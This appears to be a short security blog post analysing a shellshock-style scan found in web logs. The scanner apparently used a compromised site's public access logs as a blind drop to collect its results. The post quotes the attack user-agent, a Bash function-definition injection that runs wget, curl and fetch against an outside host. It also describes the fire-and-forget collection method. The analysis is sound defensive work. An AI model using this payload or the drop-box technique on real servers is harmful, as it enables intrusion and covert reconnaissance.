Indirect shellshock security scanning via other people's logfiles

One of my friends noted that he'd spotted a shellshock-style user-agent string in his web log files, looking like: - - [28/Apr/2016:16:55:30 -0500] "GET / HTTP/1.1" 403 4961 "-" "() { :; }; /bin/sh -c 'wget -O /dev/null;wget1 -O /dev/null;curl -o /dev/null;/usr/sfwbin/wget;fetch -/dev/null'"

Curious about whether it was a legitimate domain (perhaps owned), I googled the domain name:

Seasonally-appropriate designer labels.  Doesn't really seem like the kind of thing a white-hat security scanner would be pretending to be.  Was the domain compromised and I should try to notify them? Hmm.  What the heck - try to download the page:

 --2016-04-30 13:38:26-- 
Resolving (
Connecting to (||:80... connected.
HTTP request sent, awaiting response... 404 Not Found
2016-04-30 13:38:26 ERROR 404: Not Found.

They weren't sending a malicious payload - and the scanning had sent the results to /dev/null anyway.  Googling IPTRANSITTEST turned up a few hits in other people's logfiles... wait a second.  Logfiles.  What if had left its logfiles visible in some way, and an attacker was using this as a blind drop to find the results of their scanning without needing to collect any data back from the scanning nodes?

My first guess proved startlingly lucky:
Looking at the contents of one access log, quite a few IP addresses have downloaded the logfiles themselves, so I didn't dig further.

It's pretty clear, though, what happened:  These logfiles are easily found via a bit of "Google-scanning":
Having located an accessible drop-box to collect the results, someone recruited a set of nodes to scan lots of websites with a custom user-agent.  By using the drop-box, these nodes never need to contact the controller / response collector:  they're completely fire-and-forget, and thus, could be distributed as malware or in a host of other ways.  At some point, the controller wants to get the entries.  He/she then can just download the raw access files using Tor, finding all sorts of juicy entries like:

XXX.XXX.XXX.XXX [30/Apr/2016:09:25:12 -0700] "GET /IPTRANSITTEST HTTP/1.1" 404 73 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.19.1 Basic ECC zlib/1.2.3 libidn/1.18 libssh2/1.4.2" ""



Popular posts from this blog

Reflecting on CS Graduate Admissions

Minting Money with Monero ... and CPU vector intrinsics

Finding Bugs in TensorFlow with LibFuzzer